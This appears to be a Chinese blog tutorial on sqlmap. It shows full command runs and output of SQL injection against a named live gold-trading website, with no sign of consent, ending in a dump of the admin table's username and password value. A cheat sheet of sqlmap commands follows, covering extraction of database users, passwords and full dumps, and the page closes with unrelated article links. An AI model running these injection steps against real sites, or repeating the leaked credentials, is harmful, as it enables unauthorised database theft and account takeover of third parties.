注:标黄处为输入内容     批注为得到的信息

1.-u url --dbs 爆数据库

[root@Hacker~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --dbs

sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program

[*] starting at 15:23:20

[15:23:21] [INFO] resuming back-end DBMS 'mysql'

[15:23:21] [INFO] testing connection to the target url

[15:23:22] [INFO] heuristics detected web page charset 'UTF-8'

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1826 AND 8515=8515

Type: UNION query

Title: MySQL UNION query (NULL) - 11 columns

Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e7

46d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL,

NULL#

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1826 AND SLEEP(5)

---

[15:23:22] [INFO] the back-end DBMS is MySQL

web server operating system: Windows Vista

web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0

back-end DBMS: MySQL 5.0.11

[15:23:22] [INFO] fetching database names

[15:23:22] [INFO] the SQL query used returns 5 entries

[15:23:22] [INFO] resumed: "information_schema"

[15:23:22] [INFO] resumed: "gold"

[15:23:22] [INFO] resumed: "mysql"

[15:23:22] [INFO] resumed: "performance_schema"

[15:23:22] [INFO] resumed: "test"

available databases [5]:

[*] gold

[*] information_schema

[*] mysql

[*] performance_schema

[*] test

[15:23:23] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\outpu

t\www.lbgold.com'

[*] shutting down at 15:23:23

2. -u url --tables -D 数据库 //爆表段

[root@Hacker~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --tables -D gold

sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program

[*] starting at 15:52:54

[15:52:54] [INFO] resuming back-end DBMS 'mysql'

[15:52:55] [INFO] testing connection to the target url

[15:52:56] [INFO] heuristics detected web page charset 'UTF-8'

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1826 AND 8515=8515

Type: UNION query

Title: MySQL UNION query (NULL) - 11 columns

Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e7

46d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL,

NULL#

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1826 AND SLEEP(5)

---

[15:52:56] [INFO] the back-end DBMS is MySQL

web server operating system: Windows Vista

web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0

back-end DBMS: MySQL 5.0.11

[15:52:56] [INFO] fetching tables for database: 'gold'

[15:52:58] [INFO] the SQL query used returns 5 entries

[15:52:59] [INFO] retrieved: "admin"

[15:53:00] [INFO] retrieved: "article"

[15:53:01] [INFO] retrieved: "class"

[15:53:02] [INFO] retrieved: "content"

[15:53:03] [INFO] retrieved: "djjl"

Database: gold

[5 tables]

+---------+

| admin   |

| article |

| class   |

| content |

| djjl    |

+---------+

[15:53:04] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\outpu

t\www.lbgold.com'

[*] shutting down at 15:53:04

3. -u url --columns -T 表段 -D 数据库 //爆字段

[root@Hacker~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --columns -T admin -D gold

sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program

[*] starting at 15:58:10

[15:58:10] [INFO] resuming back-end DBMS 'mysql'

[15:58:10] [INFO] testing connection to the target url

[15:58:12] [INFO] heuristics detected web page charset 'UTF-8'

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1826 AND 8515=8515

Type: UNION query

Title: MySQL UNION query (NULL) - 11 columns

Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e7

46d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL,

NULL#

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1826 AND SLEEP(5)

---

[15:58:12] [INFO] the back-end DBMS is MySQL

web server operating system: Windows Vista

web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0

back-end DBMS: MySQL 5.0.11

[15:58:12] [INFO] fetching columns for table 'admin' in database 'gold'

[15:58:13] [INFO] the SQL query used returns 3 entries

[15:58:14] [INFO] retrieved: "id","int(2)"

[15:58:15] [INFO] retrieved: "user","char(12)"

[15:58:16] [INFO] retrieved: "password","char(36)"

Database: gold

Table: admin

[3 columns]

+----------+----------+

| Column   | Type     |

+----------+----------+

| id       | int(2)   |

| password | char(36) |

| user     | char(12) |

+----------+----------+

[15:58:17] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\outpu

t\www.lbgold.com'

[*] shutting down at 15:58:17

4.-u url --dump -C 字段 -T 表段 -D 数据库 //猜解

(1) 猜解password字段

[root@Hacker~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --dump -C password -T admin -D gold

sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program

[*] starting at 16:02:05

[16:02:05] [INFO] resuming back-end DBMS 'mysql'

[16:02:05] [INFO] testing connection to the target url

[16:02:06] [INFO] heuristics detected web page charset 'UTF-8'

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1826 AND 8515=8515

Type: UNION query

Title: MySQL UNION query (NULL) - 11 columns

Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e7

46d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL,

NULL#

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1826 AND SLEEP(5)

---

[16:02:06] [INFO] the back-end DBMS is MySQL

web server operating system: Windows Vista

web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0

back-end DBMS: MySQL 5.0.11

[16:02:06] [INFO] fetching entries of column(s) 'password' for table 'admin' in

database 'gold'

[16:02:08] [INFO] the SQL query used returns 1 entries

[16:02:09] [INFO] retrieved: "ecoDz4IPZGYNs"

[16:02:09] [INFO] analyzing table dump for possible password hashes

Database: gold

Table: admin

[1 entry]

+---------------+

| password      |

+---------------+

| ecoDz4IPZGYNs |

+---------------+

[16:02:09] [INFO] table 'gold.admin' dumped to CSV file 'E:\SQLMAP~2\Bin\output\

www.lbgold.com\dump\gold\admin.csv'

[16:02:09] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\outpu

t\www.lbgold.com'

[*] shutting down at 16:02:09

(2) 猜解id字段

[root@Hacker~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --dump -C id -T admin -D gold

sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program

[*] starting at 16:10:22

[16:10:22] [INFO] resuming back-end DBMS 'mysql'

[16:10:22] [INFO] testing connection to the target url

[16:10:23] [INFO] heuristics detected web page charset 'UTF-8'

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1826 AND 8515=8515

Type: UNION query

Title: MySQL UNION query (NULL) - 11 columns

Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e7

46d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL,

NULL#

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1826 AND SLEEP(5)

---

[16:10:23] [INFO] the back-end DBMS is MySQL

web server operating system: Windows Vista

web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0

back-end DBMS: MySQL 5.0.11

[16:10:23] [INFO] fetching entries of column(s) 'id' for table 'admin' in databa

se 'gold'

[16:10:24] [INFO] the SQL query used returns 1 entries

[16:10:25] [INFO] retrieved: "1"

[16:10:25] [INFO] analyzing table dump for possible password hashes

Database: gold

Table: admin

[1 entry]

+----+

| id |

+----+

| 1  |

+----+

[16:10:25] [INFO] table 'gold.admin' dumped to CSV file 'E:\SQLMAP~2\Bin\output\

www.lbgold.com\dump\gold\admin.csv'

[16:10:25] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\outpu

t\www.lbgold.com'

[*] shutting down at 16:10:25

(3) 猜解user字段

[root@Hacker~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --dump -C user -T admin -D gold

sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program

[*] starting at 16:10:48

[16:10:48] [INFO] resuming back-end DBMS 'mysql'

[16:10:48] [INFO] testing connection to the target url

[16:10:49] [INFO] heuristics detected web page charset 'UTF-8'

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1826 AND 8515=8515

Type: UNION query

Title: MySQL UNION query (NULL) - 11 columns

Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e7

46d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL,

NULL#

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1826 AND SLEEP(5)

---

[16:10:49] [INFO] the back-end DBMS is MySQL

web server operating system: Windows Vista

web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0

back-end DBMS: MySQL 5.0.11

[16:10:49] [INFO] fetching entries of column(s) 'user' for table 'admin' in data

base 'gold'

[16:10:49] [INFO] the SQL query used returns 1 entries

[16:10:50] [INFO] retrieved: "ssb"

[16:10:51] [INFO] analyzing table dump for possible password hashes

Database: gold

Table: admin

[1 entry]

+------+

| user |

+------+

| ssb  |

+------+

[16:10:51] [INFO] table 'gold.admin' dumped to CSV file 'E:\SQLMAP~2\Bin\output\

www.lbgold.com\dump\gold\admin.csv'

[16:10:51] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\outpu

t\www.lbgold.com'

[*] shutting down at 16:10:51

[root@Hacker~]# Sqlmap

5.sqlmap工具的使用命令

mssql access 直接爆表.然后你懂的

BT5里面的话前面就要加python

sqlmap.py -u url --dbs //爆数据库

sqlmap.py -u url --current-db //爆当前库

sqlmap.py -u url --current-user //爆当前用户

sqlmap.py -u url --users   查看用户权限

sqlmap.py -u url --tables -D 数据库 //爆表段

sqlmap.py -u url --columns -T 表段 -D 数据库 //爆字段

sqlmap.py -u url --dump -C 字段 -T 表段 -D 数据库 //猜解

sqlmap.py -u url --dump --start=1 --stop=3 -C 字段 -T 表段 -D 数据库 //猜解1到3的字段

翻回来也可以

sqlmap.py -u url  判断

sqlmap.py -u url --is-dba -v   这是判断当前数据库的使用者是否是dba

sqlmap.py -u url --users -v 0  这句的目的是列举数据库的用户

sqlmap.py -u url --passwords -v 0 这句的目的是获取数据库用户的密码

sqlmap.py -u url --privileges -v 0 这是判断当前的权限

sqlmap.py -u url --dbs -v 0 这句的目的是将所有的数据库列出来

sqlmap.py -u url --tables -D '表' 爆表

sqlmap.py -u url --columns -T ‘表’-D ‘数据库’爆列

sqlmap.py -u url --dump -T '表' --start 1 --stop 4 -v 0 这里是查询第2到第4行的内

sqlmap.py -u url --dump -all -v 0

sqlmap 使用方法及实例的更多相关文章

  1. React构建单页应用方法与实例

    React作为目前最流行的前端框架之一,其受欢迎程度不容小觑,从这门框架上我们可以学到许多其他前端框架所缺失的东西,也是其创新性所在的地方,比如虚拟DOM.JSX等.那么接下来我们就来学习一下这门框架 ...

  2. Redux状态管理方法与实例

    状态管理是目前构建单页应用中不可或缺的一环,也是值得花时间学习的知识点.React官方推荐我们使用Redux来管理我们的React应用,同时也提供了Redux的文档来供我们学习,中文版地址为http: ...

  3. JQuery 获取json数据$.getJSON方法的实例代码

    这篇文章介绍了JQuery 获取json数据$.getJSON方法的实例代码,有需要的朋友可以参考一下 前台: function SelectProject() { var a = new Array ...

  4. (转)Java 的swing.GroupLayout布局管理器的使用方法和实例

    摘自http://www.cnblogs.com/lionden/archive/2012/12/11/grouplayout.html (转)Java 的swing.GroupLayout布局管理器 ...

  5. Springmvc+Spring+Hibernate搭建方法及实例

    Springmvc+Spring+Hibernate搭建方法及实例  

  6. jQuery中on()方法用法实例详解

    这篇文章主要介绍了jQuery中on()方法用法,实例分析了on()方法的功能及各种常见的使用技巧,并对比分析了与bind(),live(),delegate()等方法的区别,需要的朋友可以参考下 本 ...

  7. (转)多个mapreduce工作相互依赖处理方法完整实例(JobControl)

    多个mapreduce工作相互依赖处理方法完整实例(JobControl) 原文地址:http://mntms.iteye.com/blog/2096456?utm_source=tuicool&am ...

  8. SQLMAP注入教程-11种常见SQLMAP使用方法详解

    sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了.今天把我一直 ...

  9. Java——静态变量/方法与实例变量/方法的区别

    静态只能调用静态 非静态: 对象名.方法名 package ti; //通过两个类 StaticDemo.LX4_1 说明静态变量/方法与实例变量/方法的区别. class StaticDemo { ...

随机推荐

  1. sql语句练习50题(Mysql版-详加注释)

    表名和字段 1.学生表       Student(s_id,s_name,s_birth,s_sex) --学生编号,学生姓名, 出生年月,学生性别 2.课程表       Course(c_id, ...

  2. testparm - 检查smb.conf配置文件的内部正确性

    总览 testparm [-s] [-h] [-L servername] [configfilename] [hostname hostIP] 描述 此程序是samba套件的一部分. testpar ...

  3. 每天一个Linux常用命令 cat命令

    在Linux系统中,cat命令是一个文本输出命令,通常用来查看某个文档的内容.它有如下三个功能: 1.一次性显示整个文件 如:查看/etc/initab文件,可以使用命令:cat/etc/initta ...

  4. Git分布式版本控制系统(下)

    Git分布式版本控制系统(下) 链接:https://pan.baidu.com/s/1CgaEv12cwfbs5RxcNpxdAg 提取码:fytm 复制这段内容后打开百度网盘手机App,操作更方便 ...

  5. OK。第一个shell script 脚本

    很简单吧.也很容易理解.读取两个字符放到变量firstname和lastname中,然后输出 编辑日期格式 上面是编辑日期格式.下面的例题是按照日期格式来分类创建文件

  6. SQL server 数据库镜像删除如何操作

    安全性 Permissions 需要对数据库拥有 ALTER 权限. 使用 SQL Server Management Studio 删除数据库镜像 在数据库镜像会话期间,连接到主体服务器实例,然后在 ...

  7. VUE.JS 环境配置

    首先安装   node.js 网址 https://nodejs.org/en/ 选择版本 点击直接安装OK  (不用安装到系统盘) 然后cmd 命令框 输入 npm -version (查看安装版本 ...

  8. Android jniLibs下目录详解(.so文件)

    http://www.jianshu.com/p/b758e36ae9b5 最近又研究了一下,参考了一下:三星/联发科等处理器规格表 更新时间:2017年5月手机CPU架构体系分类及各大厂商 PS:我 ...

  9. echarts.min.js的引入

    (1)使用地址引入 <script src="https://cdn.bootcss.com/echarts/3.7.1/echarts.min.js"></sc ...

  10. Postman Interceptor安装成功却无法在Postman启用的解决办法

    新手在使用 Postman 和Postman Interceptor的过程中总会遇到各种各样的问题.我们 chrome插件网 争取在这里汇总大家遇到的所有的问题的解决方案.今天要分享的解决方案问题是: ...